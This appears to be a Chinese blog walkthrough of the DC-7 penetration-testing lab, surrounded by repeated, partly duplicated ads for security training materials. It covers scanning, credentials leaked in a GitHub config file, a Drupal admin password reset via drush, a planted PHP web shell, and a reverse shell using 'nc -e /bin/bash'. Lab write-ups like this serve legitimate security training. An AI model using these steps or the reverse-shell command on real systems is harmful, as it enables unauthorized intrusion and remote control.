网络安全最新【DC-7靶场渗透】(1)，2024年最新算法题+网络安全+自定义View

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

172.16.100.62

2、nmap探测开放端口及服务

nmap -sT -sV -A -p- --min-rate 2000 172.16.100.62

探测到开放了80端口-http服务，22端口-ssh服务

3、浏览器访问

提示说我们需要跳出框架思考，使用暴力破解和字典攻击可能不会成功，通过wappalyzer得知cms是drupal8

4、dirsearch，dirb扫描文件和目录

dirsearch -u http://172.16.100.62

没有特别发现，但是通过观察页面发现dc7页面左下角有一个@DC7USER

尝试使用搜索引擎进行搜索，发现在github上有关于这个的信息，点进去之后发现staffdb

通过查看里面的敏感文件config.php中看到有登录的用户名和密码

username = “dc7user”;
password = “MdR3xOgB7#dW”;

至此我们就获取到了 用户名和密码

二、SSH登录

成功登录到dc7user,看到当前目录下有一个mbox的文件，查看一下

发现是个任务执行计划，发现root用户执行了backups.sh脚本，打开backups.sh文件发现里面有个drush命令

drush命令是drupal框架用来做一些配置的命令，可以用来修改用户名和密码

drush user-password admin --password="123456"

到/var/www/html目录下进行修改密码

修改成功后后台登陆

三、寻找漏洞点

然后在content下看到有个add content，点进去再进入basic page

此时发现drupal8不支持php代码，但我们发现该页面中有个extend扩展模块，应该是可以导入php模块的， extend下点击install new module，然后根据提示写入php的安装脚本页面

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

安装完成之后激活这个模块，激活之后选中点击install

安装成功之后回到basic page写入一句话木马

四、反弹shell

蚁剑连接

连接成功之后进行反弹shell的操作，打开蚁剑虚拟终端

kali终端中监听8088端口

nc -lvvp 8088

然后在蚁剑虚拟终端输入

nc -e /bin/bash 172.16.100.60 8088


**先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7**

**深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/70f6a82616f823a2d43585f164e65013.png)
![img](https://img-blog.csdnimg.cn/img_convert/ea4484e1f0dd184c267490fde6391b72.png)
![img](https://img-blog.csdnimg.cn/img_convert/5ffa9e54adf44ebd06814dc83e8748ab.png)
![img](https://img-blog.csdnimg.cn/img_convert/e101bbaac1568fc888f33235a09b9131.png)
![img](https://img-blog.csdnimg.cn/img_convert/6b6e6d2d047204edd9e46b68dc625cb5.png)
![img](https://img-blog.csdnimg.cn/img_convert/13e4616dfa6a70bb3a94ec9129ab5e2b.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**